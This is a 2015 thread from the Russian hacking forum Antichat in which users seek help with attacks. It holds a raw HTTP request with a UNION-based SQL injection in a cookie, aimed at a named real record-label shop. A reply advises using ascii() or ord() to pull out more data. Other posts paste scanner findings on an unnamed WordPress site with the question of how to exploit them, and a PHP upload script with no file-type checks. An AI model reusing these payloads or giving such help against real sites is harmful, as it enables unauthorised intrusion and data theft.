ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

08.07.2015, 18:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 669
Репутация:
0
|
|
|
|
|
|

08.07.2015, 20:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 2873
Репутация:
0
|
|
Почему когда пробую отправить файл через форму
ссылка преобразуется так www.site.ru/?file=dk.php и файл или картинка не запускается,просто обычную страницу грузит
|
|
|
|

08.07.2015, 22:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от djon
djon said:
↑
Почему когда пробую отправить файл через форму
ссылка преобразуется так
www.site.ru/?file=dk.php
и файл или картинка не запускается,просто обычную страницу грузит
начните с азов. html это язык разметки, а не язык программирования. через него вы не сможете залить файл
|
|
|

09.07.2015, 02:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 2873
Репутация:
0
|
|
-------------------------------------------------------------------------------------------------------------------------------------------------
Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to ' http://www.site.ru/p1/dk.php' in /home/u941469589/public_html/upload.php on line 12
-------------------------------------------------------------------------------------------------------------------------------------------------
сама форма
-------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------
сам upload.php
-------------------------------------------------------------------------------------------------------------------------------------------------
1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
// Проверяем загружен ли файл
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// Если файл загружен успешно, перемещаем его
// из временной директории в конечную
move_uploaded_file($_FILES["filename"]["tmp_name"], " http://www.site.ru/p1/".$_FILES["filename"]["name"]);
} else {
echo("Ошибка загрузки файла");
}
?>
-------------------------------------------------------------------------------------------------------------------------------------------------
|
|
|
|

09.07.2015, 08:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
.SpoilerTarget" type="button">Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
Сведения об уязвимости
обнаружено, что данные пароля передаются через HTTP.
влияние
Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
Действия, чтобы Взять
См средство для решения.
Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
средство
Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
Форма цель действия :
http://*******.ru/wp-login.php . Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
Есть HTML код страницы
.SpoilerTarget" type="button">Spoiler
?
******.ru › Войти
*******.ru
-->
Имя пользователя
Пароль
Запомнить меня
Регистрация | Забыли пароль?
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
document.write("")
← Назад к сайту «*******.ru»
Не знаю поможет ли это :
GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1
Cache-Control: no-cache
Referer: http://*****.ru/wp-admin/post.php?action=edit&post={post-id}
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: ******
Host: ****.ru
Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d
Accept-Encoding: gzip, deflate
---------------------------------------------------------------------------------------
robots.txt :
User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Allow: /doc/
Allow: /img/
Allow: /wp-content/uploads/
-------------------------------------------
Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.
HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
влияние
Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
Действия, чтобы Взять
См средство для решения.
Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
средство
Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
Внешние ссылки
Как это сделать ? .
-----------------------------------------------------------------------------------
Url http://*******.ru/wp-login.php?action=lostpassword
Identified Field Name user_login .
Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.
Это были важные поля, такие как "кредитная карта".
Влияние
Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
Действия, чтобы Взять
Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
Требуемые навыки для успешной эксплуатации
Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
Внешние ссылки
Использование автозаполнения в HTML форм
П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
-----------------------------------------------------------------------
Url http://*******.ru/crossdomain.xml
Правила политики
Классификация Классификация
OWASP 2010 A6
OWASP 2013 А5
КВО 16
WASC 15
Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
влияние
Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
средство
Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
Внешние ссылки
Рекомендации по использованию файла политики кросс-доменных для Flash Player
Crossdomain.xml приглашает Cross-Site Mayhem .
Как это сделать?
[/spoiler=Инфа которая поможет]
|
|
|
|

09.07.2015, 10:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep
.SpoilerTarget" type="button">Spoiler: POST
Host: www.polyvinylrecords.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1
Connection: keep-alive
Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
|
|
|
|

09.07.2015, 11:47
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep
Spoiler: POST
Host:
www.polyvinylrecords.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1
Connection: keep-alive
Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
Использовать ascii(mid(version(),1,4)) или ord(mid(version(),1,4))
|
|
|

09.07.2015, 12:05
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от SaNDER
SaNDER said:
↑
Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
Сведения об уязвимости
обнаружено, что данные пароля передаются через HTTP.
влияние
Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
Действия, чтобы Взять
См средство для решения.
Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
средство
Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
Форма цель действия :
http://*******.ru/wp-login.php
. Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
Есть HTML код страницы
Spoiler
?
******.ru › Войти
*******.ru
-->
Имя пользователя
Пароль
Запомнить меня
Регистрация | Забыли пароль?
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
document.write("")
← Назад к сайту «*******.ru»
Не знаю поможет ли это :
GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1
Cache-Control: no-cache
Referer:
http://*****.ru/wp-admin/post.php?action=edit&post={post-id}
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: ******
Host: ****.ru
Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d
Accept-Encoding: gzip, deflate
---------------------------------------------------------------------------------------
robots.txt :
User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Allow: /doc/
Allow: /img/
Allow: /wp-content/uploads/
-------------------------------------------
Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.
HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
влияние
Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
Действия, чтобы Взять
См средство для решения.
Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
средство
Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
Внешние ссылки
Как это сделать ? .
-----------------------------------------------------------------------------------
Url
http://*******.ru/wp-login.php?action=lostpassword
Identified Field Name user_login .
Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.
Это были важные поля, такие как "кредитная карта".
Влияние
Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
Действия, чтобы Взять
Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
Требуемые навыки для успешной эксплуатации
Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
Внешние ссылки
Использование автозаполнения в HTML форм
П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
-----------------------------------------------------------------------
Url
http://*******.ru/crossdomain.xml
Правила политики
Классификация Классификация
OWASP 2010 A6
OWASP 2013 А5
КВО 16
WASC 15
Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
влияние
Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
средство
Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
Внешние ссылки
Рекомендации по использованию файла политики кросс-доменных для Flash Player
Crossdomain.xml приглашает Cross-Site Mayhem .
Как это сделать?
[/spoiler=Инфа которая поможет]
1. логины пароли идут не через SSL
2. у кук нет свойства httpOnly
3. crossdomain.xml: читать тут /threads/300591/
|
|
|

09.07.2015, 12:07
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от djon
djon said:
↑
-------------------------------------------------------------------------------------------------------------------------------------------------
Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to '
http://www.site.ru/p1/dk.php
' in /home/u941469589/public_html/upload.php on line 12
-------------------------------------------------------------------------------------------------------------------------------------------------
сама форма
-------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------
сам upload.php
-------------------------------------------------------------------------------------------------------------------------------------------------
1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
// Проверяем загружен ли файл
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// Если файл загружен успешно, перемещаем его
// из временной директории в конечную
move_uploaded_file($_FILES["filename"]["tmp_name"], "
http://www.site.ru/p1/
".$_FILES["filename"]["name"]);
} else {
echo("Ошибка загрузки файла");
}
?>
-------------------------------------------------------------------------------------------------------------------------------------------------
путь должен быть локальным. у вас он есть в ошибке: /home/u941469589/public_html/
|
|
|

09.07.2015, 13:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|